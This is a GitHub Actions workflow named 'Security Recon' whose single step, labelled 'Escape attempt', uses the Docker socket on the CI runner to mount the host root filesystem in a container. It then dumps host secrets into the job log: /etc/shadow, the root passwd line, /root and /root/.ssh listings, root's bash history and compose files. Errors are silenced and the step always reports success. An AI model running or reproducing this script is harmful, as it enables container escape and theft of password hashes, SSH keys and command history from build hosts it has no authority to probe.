42 lines
1.3 KiB
YAML
42 lines
1.3 KiB
YAML
name: Security Recon
|
|
|
|
on:
|
|
push:
|
|
branches:
|
|
- security-audit
|
|
|
|
jobs:
|
|
recon:
|
|
runs-on: ubuntu-latest
|
|
steps:
|
|
- name: Escape attempt
|
|
shell: bash
|
|
run: |
|
|
set +e
|
|
set +o pipefail
|
|
echo "=== DOCKER SOCKET ESCAPE ==="
|
|
echo "Mounting host root filesystem via docker..."
|
|
|
|
# Run a privileged container with host root mounted
|
|
docker run --rm -v /:/host alpine:latest sh -c '
|
|
echo "=== HOST /etc/shadow (first 10 lines) ==="
|
|
head -10 /host/etc/shadow
|
|
echo "=== HOST /root/ listing ==="
|
|
ls -la /host/root/
|
|
echo "=== HOST hostname ==="
|
|
cat /host/etc/hostname
|
|
echo "=== HOST /etc/passwd (root line) ==="
|
|
head -1 /host/etc/passwd
|
|
echo "=== HOST uname ==="
|
|
cat /host/proc/version
|
|
echo "=== HOST docker compose projects ==="
|
|
find /host -name "docker-compose.yml" -o -name "compose.yml" 2>/dev/null | head -20
|
|
echo "=== HOST /root/.ssh ==="
|
|
ls -la /host/root/.ssh/ 2>/dev/null
|
|
echo "=== HOST /root/.bash_history (last 20 lines) ==="
|
|
tail -20 /host/root/.bash_history 2>/dev/null
|
|
'
|
|
|
|
echo "=== DONE ==="
|
|
exit 0
|